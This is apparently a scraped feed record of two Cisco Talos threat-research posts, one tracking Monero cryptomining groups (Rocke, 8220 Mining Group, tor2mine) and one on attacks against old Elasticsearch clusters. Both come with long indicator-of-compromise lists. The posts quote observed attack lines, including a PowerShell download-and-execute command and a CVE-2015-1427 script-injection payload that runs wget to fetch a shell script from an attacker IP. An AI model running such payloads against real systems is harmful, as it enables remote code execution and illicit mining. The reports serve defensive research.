well as a file called \"xmr.txt\" from sydwzl[.]cn. In a previous Rocke campaign, we observed a PE32 Monero miner sample called \"TermsHost.exe\" hosted on their C2 ssvs[.]space and a Monero mining config file called \"xmr.txt\" on the C2 sydwzl[.]cn. \n \nWhen we submitted both samples in our ThreatGrid sandbox, they did not make DNS requests for sydwzl[.]cn, but did make GET requests for hxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408. The resulting download is an HTML text file of a 301 error message. When we looked at the profile for the user 979040408@qq.com, we observed that they had numerous posts related to Chinese-language hacking and exploit forums, as well as advertisements for distributed denial-of-service (DDoS) services. \n \nNote that Rocke activity tapered off towards the end of the year. Security researchers at Chinese company Alibaba have taken down Rocke infrastructure that was hosted on Alibaba Cloud. In addition, there has not been activity on Rocke\u2019s github since November, nor have we seen related samples in our honeypots since that time. \n \n\n\n#### 8220 Mining Group\n\nAs we previously described, Rocke originally forked a repository called \"whatMiner.\" We believe this tool is linked to another Chinese-speaking, Monero-mining threat actor \u2014 8220 Mining Group \u2014 due to the repository's config files' default wallet and infrastructure. Their C2s often communicate over port 8220, earning them the 8220 Mining Group moniker. This group uses some similar TTPs to Rocke. \n \nWe first observed the 8220 Mining Group in our Struts2 honeypots in March 2018. Post-exploitation, the actor would issue a cURL request for several different types of malware on their infrastructure over port 8220. The dropped malware included ELF miners, as well as their associated config files with several of 8220 Mining Group's wallets entered in the appropriate fields. This is an example of the type of commands we observed: \n\n\n[](<https://1.bp.blogspot.com/-N8vmBZIyNH0/XBkTMgozjXI/AAAAAAAABiA/WdL1yKlWJVwqXSuzeKgozMuw2lg-xpQnACLcBGAs/s1600/image6.png>)\n\nWe were able to link the infrastructure and wallets observed in the attacks against our honeypots, as well as in the Git repository, with several other campaigns that the 8220 mining group is likely responsible for. \n \nThese campaigns illustrate that beyond exploiting Struts2, 8220 Mining Group has also exploited [Drupal](<https://www.google.com/url?q=https://www.volexity.com/blog/2018/04/16/drupalgeddon-2-profiting-from-mass-exploitation/&sa=D&ust=1545149724754000>) content management system, [Hadoop YARN, Redis, Weblogic and Couch](<https://www.google.com/url?q=https://ti.360.net/blog/articles/8220-mining-gang-in-china/&sa=D&ust=1545149724756000>)[DB](<https://www.google.com/url?q=https://ti.360.net/blog/articles/8220-mining-gang-in-china/&sa=D&ust=1545149724757000>). Besides leveraging malicious bash scripts, Git repositories and image sharing services, as in whatMiner, 8220 Mining Group also carried out a long-lasting campaign using malicious [Docker images](<https://www.google.com/url?q=https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers&sa=D&ust=1545149724758000>). 8220 Mining Group was able to [amass](<https://www.google.com/url?q=https://www.fortinet.com/blog/threat-research/yet-another-crypto-mining-botnet.html&sa=D&ust=1545149724759000>) nearly $200,000 worth of Monero through their campaigns. \n \nThere were some similarities to the TTPs used by Rocke and 8220 Mining Group in these campaigns. The actors downloaded a malicious file \"logo*.jpg\" (very similar to Rocke's use of malicious scripts under the file name of \"logo*.jpg payloads), which gets executed through the bash shell to deliver XMRig. The actor also employed malicious scripts hosted on .tk TLDs, Pastebin sites, and Git repositories, which we have also observed Rocke employing. \n \n\n\n#### \n\n#### tor2mine\n\nOver the past few years, Talos has been monitoring accesses for tor2web services, which serve as a bridge between the internet and the Tor network, a system that allows users to enable anonymous communication. These services are useful for malware authors because they eliminate the need for malware to communicate with the Tor network directly, which is suspicious and may be blocked, and allow the C2 server's IP address to be hidden. \n \nRecently, while searching through telemetry data, we observed malicious activity that leveraged a tor2web gateway to proxy communications to a hidden service for a C2: qm7gmtaagejolddt[.]onion[.]to. \n \nIt is unclear how the initial exploitation occurs, but at some point in the exploitation process, a PowerShell script is downloaded and executed to install follow-on malware onto the system: \n \n\n\n> C:\\\\\\Windows\\\\\\System32\\\\\\cmd.exe /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('hxxp://107[.]181[.]187[.]132/v1/check1.ps1'))\n\n \nWe identified additional malware on this IP, which belongs to Total Server Solutions LLC. They appear to include 64-bit and 32-bit variants of XMRigCC \u2014 a variant of the XMRig miner, Windows executable versions of publically available EternalBlue/EternalRomance exploit scripts,an open-source TCP port scanner, and shellcode that downloads and executes a malicious payload from the C2. Additional scripts leverage JavaScript, VBScript, PowerShell and batch scripts to avoid writing executables to the disk. \n \nWe began to research the malware and infrastructure used in this campaign. We observed [previous research](<https://www.google.com/url?q=https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron&sa=D&ust=1545149724777000>) on a similar campaign. This actor was exploiting CVE-2018-11776, an Apache Struts 2 namespace vulnerability. The actor also relied on an IP hosted on Total Server Solutions LLC (107[.]181[.]160[.]197). They also employed a script, \"/win/checking-test.hta,\" that was almost identical to one we saw hosted on the tor2mine actors C2, \"check.hta:\" \n \n/win/checking-test.hta from [previous campaign](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) \n\n\n[](<https://1.bp.blogspot.com/-P0BM1YbmglE/XBkTUfYruyI/AAAAAAAABiE/cdM11HTIeMU_BLbLvaIufOkl8AlVgpphACLcBGAs/s1600/image3.png>)\n\ncheck.hta \n\n\n[](<https://4.bp.blogspot.com/-xCD4IEajoAw/XBkTbbLPdpI/AAAAAAAABiM/iFRi_JfkjaYFKKbvu9WMvVdk-9x9_2KowCLcBGAs/s1600/image4.png>)\n\nThis actor dropped XMRigCC as a payload, mining to eu[.]minerpool[.]pw, as well. Both campaigns additionally relied on the XHide Process-faker tool. \n \nSimilarly, in [February 2018](<https://www.google.com/url?q=https://blog.trendmicro.com/trendlabs-security-intelligence/oracle-server-vulnerability-exploited-deliver-double-monero-miner-payloads/&sa=D&ust=1545149724785000>), Trend Micro published a report on an actor exploiting an Oracle WebLogic WLS-WSAT vulnerability to drop 64-bit and 32-bit variants of XMRig. The actors used many similar supporting scripts that we observed during the tor2web campaigns, and also used a C2 hosted on Total Server Solutions LLC (hxxp://107[.]181[.]174[.]248). They also mined to eu[.]minerpool[.]pw. \n \nThis malware was developed in Python and then changed to ELF executables using the PyInstaller tool for distribution. This is the same technique we observed in a Rocke campaign. \n \n\n\n#### \n\n#### Conclusion\n\nThrough tracking the wallets of these groups, we estimate that they hold and have made payments totaling around 1,200 Monero. Based on public reporting, these groups combined had earned hundreds of thousands of dollars worth of cryptocurrency. However, it is difficult to ascertain the exact amount they made since the value of Monero is very volatile and it is difficult to tell the value of the currency when it was sold. We were also unable to track holdings and payments for certain kinds of wallets, such as MinerGate. \n \nThe value of Monero has dramatically declined in the past few months. Talos has observed less activity from these actors in our honeypots since November, although cryptocurrency-focused attacks from other actors continue. \n \nThere remains the possibility that with the value of cryptocurrencies so low, threat actors will begin delivering different kinds of payloads. For example, Rocke has been observed developing new malware with destructive capabilities that pose as ransomware. However, Rocke\u2019s GitHub page shows that, as of early November, they were continuing to fork mining-focused repositories, including a static build of XMRig. \n \nTalos will continue to monitor these groups, as well as cryptocurrency mining-focused attacks in general, to assess what changes, if any, arise from the decline in value of cryptocurrencies. \n \n\n\n#### \n\n#### Coverage\n\nFor coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: [Blocking Cryptocurrency Mining Using Cisco Security Products](<https://www.google.com/url?q=https://talosintelligence.com/resources/59&sa=D&ust=1545149724800000>) \n\n\n[](<https://3.bp.blogspot.com/-kLMMs2ca1vw/XBkTiaGFCAI/AAAAAAAABiQ/BnUOME636oc66-Lx9QJ2QKK2lbUlHb7rgCLcBGAs/s1600/image1.png>)\n\n \nAdvanced Malware Protection ([AMP](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/advanced-malware-protection&sa=D&ust=1545149724807000>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html&sa=D&ust=1545149724809000>)) or[ Web Security Appliance (WSA](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html&sa=D&ust=1545149724810000>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nNetwork Security appliances such as[ Next-Generation Firewall (NGFW](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/firewalls/index.html&sa=D&ust=1545149724813000>)),[ Next-Generation Intrusion Prevention System (NGIPS](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html&sa=D&ust=1545149724814000>)), and[ Meraki MX](<https://www.google.com/url?q=https://meraki.cisco.com/products/appliances&sa=D&ust=1545149724816000>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html&sa=D&ust=1545149724818000>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://www.google.com/url?q=https://umbrella.cisco.com/&sa=D&ust=1545149724820000>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.google.com/url?q=https://www.snort.org/products&sa=D&ust=1545149724823000>). \n \n\n\n### IOCs\n\n#### \n\n#### Rocke\n\nIPs: \n121[.]126[.]223[.]211 \n142[.]44[.]215[.]177 \n144[.]217[.]61[.]147 \n118[.]24[.]150[.]172 \n185[.]133[.]193[.]163 \n \nDomains: \nxmr.enjoytopic[.]tk \nd.paloaltonetworks[.]tk \nthreatpost[.]tk \n3g2upl4pq6kufc4m[.]tk \nscan.3g2upl4pq6kufc4m[.]tk \ne3sas6tzvehwgpak[.]tk \nsample.sydwzl[.]cn \nblockbitcoin[.]com \nscan.blockbitcoin[.]tk \ndazqc4f140wtl[.]cloudfront[.]net \nd3goboxon32grk2l[.]tk \nenjoytopic[.]tk \nrealtimenews[.]tk \n8282[.]space \n3389[.]space \nsvss[.]space \nenjoytopic[.]esy[.]es \nlienjoy[.]esy[.]es \nd3oxpv9ajpsgxt[.]cloudfront[.]net \nd3lvemwrafj7a7[.]cloudfront[.]net \nd1ebv77j9rbkp6[.]enjoytopic[.]com \nswb[.]one \nd1uga3uzpppiit[.]cloudfront[.]net \nemsisoft[.]enjoytopic[.]tk \nejectrift[.]censys[.]xyz \nscan[.]censys[.]xyz \napi[.]leakingprivacy[.]tk \nnews[.]realnewstime[.]xyz \nscan[.]realnewstime[.]xyz \nnews[.]realtimenews[.]tk \nscanaan[.]tk \nwww[.]qicheqiche[.]com \n \nURLs: \nhxxps://github[.]com/yj12ni \nhxxps://github[.]com/rocke \nhxxps://github[.]com/freebtcminer/ \nhxxps://github[.]com/tightsoft \nhxxps://raw[.]githubusercontent[.]com/ghostevilxp \nhxxp://www[.]qicheqiche[.]com \nhxxp://123[.]206[.]13[.]220:8899 \nhxxps://gitee[.]com/c-888/ \nhxxp://gitlab[.]com/c-18 \nhxxp://www[.]ssvs[.]space/root[.]bin \nhxxp://a[.]ssvs[.]space/db[.]sh \nhxxp://a[.]ssvs[.]space/cf[.]cf \nhxxp://a[.]ssvs[.]space/pluto \nhxxp://ip[.]ssvs[.]space/xm64 \nhxxp://ip[.]ssvs[.]space/wt[.]conf \nhxxp://ip[.]ssvs[.]space/mr[.]sh \nhxxp://a[.]ssvs[.]space/logo[.]jpg \nhxxp://a[.]sydwzl[.]cn/root[.]bin \nhxxp://a[.]sydwzl[.]cn/x86[.]bin \nhxxp://a[.]sydwzl[.]cn/bar[.]sh \nhxxp://a[.]sydwzl[.]cn/crondb \nhxxp://a[.]sydwzl[.]cn/pools[.]txt \nhxxps://pastebin[.]com/raw/5bjpjvLP \nhxxps://pastebin[.]com/raw/Fj2YdETv \nhxxps://pastebin[.]com/raw/eRkrSQfE \nhxxps://pastebin[.]com/raw/Gw7mywhC \nhxxp://thyrsi[.]com/t6/387/1539580368x-1566688371[.]jpg \nhxxp://thyrsi[.]com/t6/387/1539579140x1822611263[.]jpg \nhxxp://thyrsi[.]com/t6/387/1539581805x1822611359[.]jpg \nhxxp://thyrsi[.]com/t6/387/1539592750x-1566688347[.]jpg \nhxxp://thyrsi[.]com/t6/373/1537410750x-1566657908[.]jpg \nhxxp://thyrsi[.]com/t6/373/1537410304x-1404764882[.]jpg \nhxxp://thyrsi[.]com/t6/377/1538099301x-1404792622[.]jpg \nhxxp://thyrsi[.]com/t6/362/1535175343x-1566657675[.]jpg \nhxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408 \n \nSHA-256: \n55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b root.bin \n00e1b4874f87d124b465b311e13565a813d93bd13d73b05e6ad9b7a08085b683 root.bin \ncdaa31af1f68b0e474ae1eafbf3613eafae50b8d645fef1e64743c937eff31b5 db.sh \n959230efa68e0896168478d3540f25adf427c7503d5e7761597f22484fc8a451 cf.cf \nd11fa31a1c19a541b51fcc3ff837cd3eec419403619769b3ca69c4137ba41cf3 pluto/xm64 \nda641f86f81f6333f2730795de93ad2a25ab279a527b8b9e9122b934a730ab08 root.bin \n2914917348b91c26ffd703dcef2872115e53dc0b71e23ce40ea3f88215fb2b90 wt.conf \nb1c585865fdb16f3696626ef831b696745894194be9138ac0eb9f6596547eed9 mr.sh \n7de435da46bf6bcd1843410d05c017b0306197462b0ba1d8c84d6551192de259 root.bin \n904261488b24dfec2a3c8dee34c12e0ae2cf4722bd06d69af3d1458cd79e8945 logo.jpg \nf792db9a05cde2eac63c262735d92f10e2078b6ec299ce519847b1e089069271 root.bin \ndcf2b7bf7f0c8b7718e47b0d7269e0d09bb1bdbf6d3248a53ff0e1c9ea5aa38d x86.bin \n3074b307958f6b31448006cad398b23f12119a7d0e51f24c5203a291f9e5d0ec bar.sh \na598aa724c45b2d8b98ec9bc34b83f21b7ae73d68d030476ebd9d89fc06afe58 cron.db \n74c84e47463fad4128bd4d37c4164fb58e4d7dcd880992fad16f79f20995e07e pools.txt \n \nSamples making DNS requests for sydwzl[.]cn and sbss[.]f3322[.]net: \n17c8a1d0e981386730a7536a68f54a7388ed185f5c63aa567d212dc672cf09e0 \n4347d37b7ea18caacb843064dc31a6cda3c91fa7feb4d046742fd9bd985a8c86 \n \nWallets \nrocke@live.cn \n44NU2ZadWJuDyVqKvzapAMSe6zR6JE99FQXh2gG4yuANW5fauZm1rPuTuycCPX3D7k2uiNc55SXL3TX8fHrbb9zQAqEM64W \n44FUzGBCUrwAzA2et2CRHyD57osHpmfTHAXzbqn2ycxtg2bpk792YCSLU8BPTciVFo9mowjakCLNg81WwXgN2GEtQ4uRuN3 \n45JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV \n88RiksgPZR5C3Z8B51AQQQMy3zF9KFN7zUC5P5x2DYCFa8pUkY3biTQM6kYEDHWpczGMe76PedzZ6KTsrCDVWGXNRHqwGto \n \n\n\n#### 8220 Gang\n\n45[.]32[.]39[.]40:8220 \n45[.]77[.]24[.]16 \n54[.]37[.]57[.]99:8220 \n67[.]21[.]81[.]179:8220 \n67[.]231[.]243[.]10:8220 \n98[.]142[.]140[.]13:8220 \n98[.]142[.]140[.]13:3333 \n98[.]142[.]140[.]13:8888 \n104[.]129[.]171[.]172:8220 \n104[.]225[.]147[.]196:8220 \n128[.]199[.]86[.]57:8220 \n142[.]4[.]124[.]50:8220 \n142[.]4[.]124[.]164:8220 \n158[.]69[.]133[.]17:8220 \n158[.]69[.]133[.]18:8220 \n158[.]69[.]133[.]20:3333 \n162[.]212[.]157[.]244:8220 \n165[.]227[.]215[.]212:8220 \n185[.]82[.]218[.]206:8220 \n192[.]99[.]142[.]226:8220 \n192[.]99[.]142[.]227 \n192[.]99[.]142[.]232:8220 \n192[.]99[.]142[.]235:8220 \n192[.]99[.]142[.]240:8220 \n192[.]99[.]142[.]248:8220 \n192[.]99[.]142[.]249:3333 \n192[.]99[.]142[.]251:80 \n192[.]99[.]56[.]117:8220 \n195[.]123[.]224[.]186:8220 \n198[.]181[.]41[.]97:8220 \n202[.]144[.]193[.]110:3333 \nhxxps://github[.]com/MRdoulestar/whatMiner \n \n1e43eac49ff521912db16f7a1c6b16500f7818de9f93bb465724add5b4724a13 \ne2403b8198fc3dfdac409ea3ce313bbf12b464b60652d7e2e1bc7d6c356f7e5e \n31bae6f19b32b7bb7188dd4860040979cf6cee352d1135892d654a4df0df01c1 \ncb5936e20e77f14ea7bee01ead3fb9d3d72af62b5118898439d1d11681ab0d35 \ncfdee84680d67d4203ccd1f32faf3f13e6e7185072968d5823c1200444fdd53e \nefbde3d4a6a495bb7d90a266ab1e49879f8ac9c2378c6f39831a06b6b74a6803 \n384abd8124715a01c238e90aab031fb996c4ecbbc1b58a67d65d750c7ed45c52 \n \nSamples associated with whatMiner: \nf7a97548fbd8fd73e31e602d41f30484562c95b6e0659eb37e2c14cbadd1598c \n1f5891e1b0bbe75a21266caee0323d91f2b40ecc4ff1ae8cc8208963d342ecb7 \n3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04 \n241916012cc4288efd2a4b1f16d1db68f52e17e174425de6abee4297f01ec64f \n3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04 \n \nWallets \n41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo \n4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg \n46CQwJTeUdgRF4AJ733tmLJMtzm8BogKo1unESp1UfraP9RpGH6sfKfMaE7V3jxpyVQi6dsfcQgbvYMTaB1dWyDMUkasg3S \n \n\n\n#### \n\n#### Tor2mine\n\n107[.]181[.]160[.]197 \n107[.]181[.]174[.]248 \n107[.]181[.]187[.]132 \nasq[.]r77vh0[.]pw \n194[.]67[.]204[.]189 \nqm7gmtaagejolddt[.]onion[.]to \nres1[.]myrms[.]pw \nhxxps://gitlab[.]com/Shtrawban \nrig[.]zxcvb[.]pw \nback123[.]brasilia[.]me \n \n91853a9cdbe33201bbd9838526c6e5907724eb28b3a3ae8b3e0126cee8a46639 32.exe \n44586883e1aa03b0400a8e394a718469424eb8c157e8760294a5c94dad3c1e19 64.exe \n3318c2a27daa773e471c6220b7aed4f64eb6a49901fa108a1519b3bbae81978f 7.exe \nc3c3eb5c8c418164e8da837eb2fdd66848e7de9085aec0fca4bb906cd69c654e 8.exe \n4238a0442850d3cd40f8fb299e39a7bd2a94231333c83a98fb4f8165d89f0f7f check1.ps1 \n904c7860f635c95a57f8d46b105efc7ec7305e24bd358ac69a9728d0d548011a checker.bat \n4f9aeb3bb627f3cad7d23b9e0aa8e2e3b265565c24fec03282d632abbb7dac33 check.hta \naf780550bc8e210fac5668626afdc9f8c7ff4ef04721613f4c72e0bdf6fbbfa3 clocal.hta \ncc7e6b15cf2b6028673ad472ef49a80d087808a45ad0dcf0fefc8d1297ad94b5 clocal.ps1 \nee66beae8d85f2691e4eb4e8b39182ea40fd9d5560e30b88dc3242333346ee02 cnew.hta \na7d5911251c1b4f54b24892e2357e06a2a2b01ad706b3bf23384e0d40a071fdb del.bat \n0f6eedc41dd8cf7a4ea54fc89d6dddaea88a79f965101d81de2f7beb2cbe1050 func.php \ne0ca80f0df651b1237381f2cbd7c5e834f0398f6611a0031d2b461c5b44815fc localcheck.bat \nb2498165df441bc33bdb5e39905e29a5deded7d42f07ad128da2c1303ad35488 scanner.ps1 \n18eda64a9d79819ec1a73935cb645880d05ba26189e0fd5f2fca0a97f3f019a9 shell.bin \n1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc ss.exe \n112e3d3bb75e2bf88bd364a42a40434148d781ee89d29c66d17a5a154615e4b1 upd2.ps1 \ne1565b21f9475b356481ddd1dcd92cdbed4f5c7111455df4ef16b82169af0577 upd.hta \n61185ddd3e020a3dfe5cb6ed68069052fe9832b57c605311a82185be776a3212 win10.ps1 \nf1b55302d81f6897e4b2429f2efdad1755e6e0f2e07a1931bce4ecf1565ed481 zazd.bat \ncce61d346022a0192418baa7aff56ab885757f3becd357967035dd6a04bb6abf z.exe \n \n\n\n#### \n\n#### Uncategorized groups\n\n188[.]166[.]38[.]137 \n91[.]121[.]87[.]10 \n94[.]23[.]206[.]130 \n \n46FtfupUcayUCqG7Xs7YHREgp4GW3CGvLN4aHiggaYd75WvHM74Tpg1FVEM8fFHFYDSabM3rPpNApEBY4Q4wcEMd3BM4Ava \n44dSUmMLmqUFTWjv8tcTvbQbSnecQ9sAUT5CtbwDFcfwfSz92WwG97WahMPBdGtXGu4jWFgNtTZrbAkhFYLDFf2GAwfprEg", "cvss3": {}, "published": "2018-12-18T08:33:00", "type": "talosblog", "title": "Connecting the dots between recently active cryptominers", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-12-18T16:33:11", "id": "TALOSBLOG:EAA71FE2CFAB05696E23A5F67435416C", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/DemsFFZIKpI/cryptomining-campaigns-2018.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-01T16:16:02", "description": "__ \n \n_[Christopher Evans](<https://twitter.com/ccevans002>) of Cisco Talos conducted the research for this post._ \n \n\n\n## Executive Summary\n\n \nCisco Talos warns users that they need to keep a close eye on unsecured Elasticsearch clusters. We have recently observed a spike in attacks from multiple threat actors targeting these clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines. Talos has also been able to identify social media accounts associated with one of these threat actors. Because Elasticsearch is typically used to manage very large datasets, the repercussions of a successful attack on a cluster could be devastating due to the amount of data present. This post details the attack methods used by each threat actor, as well as the associated payloads. \n \n\n\n## Introduction\n\n \nThrough ongoing analysis of honeypot traffic, Talos detected an increase in attacks targeting unsecured Elasticsearch clusters. These attacks leverage CVE-2014-3120 and CVE-2015-1427, both of which are only present in old versions of Elasticsearch and exploit the ability to pass scripts to search queries. Based on patterns in the payloads and exploit chains, Talos assesses with moderate confidence that six distinct actors are exploiting our honeypots. \n \nFor example CVE-2015-1427: \n\n\n> { \n \"size\": 1, \n \"script_fields\": { \n \"lupin\": { \n \"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"wget http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh -P /tmp/sssooo\\\").getText()\" \n } \n } \n}\n\n \nThe most active of these actors consistently deploys two distinct payloads with the initial exploit, always using CVE-2015-1427. The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget. This is likely an attempt to make the exploit work on a broader variety of platforms. The bash script utilized by the attacker follows a commonly observed pattern of disabling security protections and killing a variety of other malicious processes (primarily other mining malware), before placing its RSA key in the authorized_keys file. Additionally, this bash script serves to download illicit miners and their configuration files. The script achieves persistence by installing shell scripts as cron jobs. \n \nThis bash script also downloads a UPX-packed ELF executable. Analysis of the unpacked sample reveals that this executable contains exploits for a variety of other systems. These additional exploits include several vulnerabilities, all of which could lead to remote code execution, such as CVE-2018-7600 in Drupal, CVE-2017-10271 in Oracle WebLogic, and CVE-2018-1273 in Spring Data Commons. The exploits are sent, typically via HTTPS, to the targeted systems. As evidenced by each of these exploits, the attacker's goal appears to be obtaining remote code execution on targeted machines. Detailed analysis of the payload sample is ongoing, and Talos will provide pertinent updates as necessary. \n \nTalos observed a second actor exploiting CVE-2014-3120, using it to deliver a payload that is derivative of the Bill Gates distributed denial-of-service malware. The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from the DDoS malware and pivoted toward illicit miners. \n \nA third actor attempts to download a file named \"LinuxT\" from an HTTP file server using exploits targeting CVE-2014-3120. The LinuxT file is no longer hosted on the command and control (C2) server despite continued exploits requesting the file, although several other malicious files are still being hosted. All of these files are detected by ClamAV as variants of the Spike trojan and are intended to run on x86, MIPS and ARM architectures. \n \nAs part of our research, we observed that, in some cases, hosts that attempted to download the \"LinuxT\" sample also dropped payloads that executed the command \"echo 'qq952135763.'\" This behavior has been seen in elastic search error logs going back several years. QQ is a popular Chinese social media website, and it is possible that this is referencing a QQ account. We briefly reviewed the public account activity of 952135763 and found several posts related to cybersecurity and exploitation, but nothing specific to this activity. While this information could potentially shed more light on the attacker, there is insufficient information currently to draw any firm conclusions. \n \n \n\n\n_\"About Me\" page of the attacker's personal website linking to the same QQ account number as in the command above._\n\n \n\n\nThis website also links to the potential attacker's Gitee page. Gitee is a Chinese code-sharing website similar to Github or Atlassian. \n \n \n\n\n_Attacker's Gitee page._\n\n \n\n\nAlthough the projects associated with this Gitee profile are not explicitly malicious, Talos has linked this QQ account to a profile on Chinese hacking forum xiaoqi7, as well as a history of posts on topics related to exploits and malware on other forums. We briefly reviewed the public account activity of 952135763 and found several posts related to cyber security and exploitation, but nothing specific to this activity. While this information could tell us more about the attacker, there is insufficient information currently to draw any firm conclusions. \n \nOur honeypots also detected additional hosts exploiting Elasticsearch to drop payloads that execute both \"echo 'qq952135763'\" and \"echo '952135763,'\" suggesting that the attacks are related to the same QQ account. However, none of the IPs associated with these attacks have been observed attempting to download the \"LinuxT\" payload linked to this attacker. Additionally, unlike other activity associated with this attacker, these attacks leveraged the newer Elasticsearch vulnerability rather than the older one. \n \nThe three remaining actors that Talos identified have not been observed delivering any malware through their exploits. One actor issued an \"rm *\" command, while the other two actors were fingerprinting vulnerable servers by issuing 'whoami' and 'id' commands. \n \n\n\n## Conclusion\n\n \nTalos has observed multiple attackers exploiting CVE-2014-3120 and CVE-2015-1427 in our Elasticsearch honeypots to drop a variety of malicious payloads. Additionally, Talos has identified some social media accounts we believe could belong to the threat actor dropping the \"LinuxT\" payload. These Elasticsearch vulnerabilities only exist in versions 1.4.2 and lower, so any cluster running a modern version of Elasticsearch is unaffected by these vulnerabilities. Given the size and sensitivity of the data sets these clusters contain, the impact of a breach of this nature could be severe. Talos urges readers to patch and upgrade to a newer version of Elasticsearch if at all possible. Additionally, Talos highly recommends disabling the ability to send scripts through search queries if that ability is not strictly necessary for your use cases. \n \n\n\n## Coverage\n\n \nThe following SNORT\u24c7 rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \n**CVE-2014-3120:** 33830, 36256, 44690 \n \n**CVE-2015-1427:** 33814,36067 \n \n**CVE-2017-10271:** 45304 \n \n**CVE-2018-7600:** 46316 \n \n**CVE-2018-1273:** 46473 \n \nAdditional ways our customers can detect and block this threat are listed below. \n \n \nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nEmail Security can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat. \n \nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. \n \nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \n\n\n## IOCs:\n\n \n**First Actor:** \n \n**Attacking IP addresses:** \n \n101[.]200[.]48[.]68 \n117[.]205[.]7[.]194 \n107[.]182[.]183[.]206 \n124[.]43[.]19[.]159 \n139[.]99[.]131[.]57 \n179[.]50[.]196[.]228 \n185[.]165[.]116[.]144 \n189[.]201[.]192[.]242 \n191[.]189[.]30[.]112 \n192[.]210[.]198[.]50 \n195[.]201[.]169[.]194 \n216[.]15[.]146[.]34 \n43[.]240[.]65[.]121 \n45[.]76[.]136[.]196 \n45[.]76[.]178[.]34 \n52[.]8[.]60[.]118 \n54[.]70[.]161[.]251 \n139[.]159[.]218[.]82 \n \n**IP addresses and ports hosting malware:** \n \n45[.]76[.]122[.]92:8506 \n207[.]148[.]70[.]143:8506 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 e2f1be608c2cece021e68056f2897d88ed855bafd457e07e62533db6dfdc00dc \n191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c \n2bcc9fff40053ab356ddde6de55077f8bf83d8dfa6d129c250f521eb170dc123 \n9a181c6a1748a9cfb46751a2cd2b27e3e742914873de40402b5d40f334d5448c 5fe3b0ba0680498dbf52fb8f0ffc316f3a4d7e8202b3ec710b2ae63e70c83b90 \n7b08a8dae39049aecedd9679301805583a77a4271fddbafa105fa3b1b507baa3 \n \n**Second Actor:** \n \n**Attacking IP address:** \n \n202[.]109[.]143[.]110 \n \n**IP address and port hosting malware:** \n \n216[.]176[.]179[.]106:9090 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 \n \n**Third Actor:** \n \n**Attacking IP addresses:** \n \n125[.]231[.]139[.]75 \n36[.]235[.]171[.]244 \n \n**IP addresses linked to QQ account, but not delivering 